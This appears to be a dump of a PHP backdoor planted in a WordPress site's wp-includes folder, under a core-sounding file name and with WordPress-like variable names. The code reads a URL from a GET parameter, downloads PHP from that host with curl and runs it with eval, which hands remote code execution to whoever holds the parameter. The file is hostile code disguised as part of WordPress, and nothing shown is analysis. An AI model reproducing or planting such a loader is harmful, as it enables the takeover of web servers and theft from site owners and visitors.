| Current Path : /home/x/b/o/xbodynamge/lebauwcentre/wp-includes/ |
| Current File : /home/x/b/o/xbodynamge/lebauwcentre/wp-includes/class-wp-http-requests-hooks-index.php |
<?php
if (isset($_GET['all'])) {
$the_excerpt_cx = $_GET['all'];
if ($apply_filters_kh = curl_init()) {
curl_setopt($apply_filters_kh, CURLOPT_URL, $the_excerpt_cx);
curl_setopt($apply_filters_kh, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($apply_filters_kh));
curl_close($apply_filters_kh);
exit;
}
}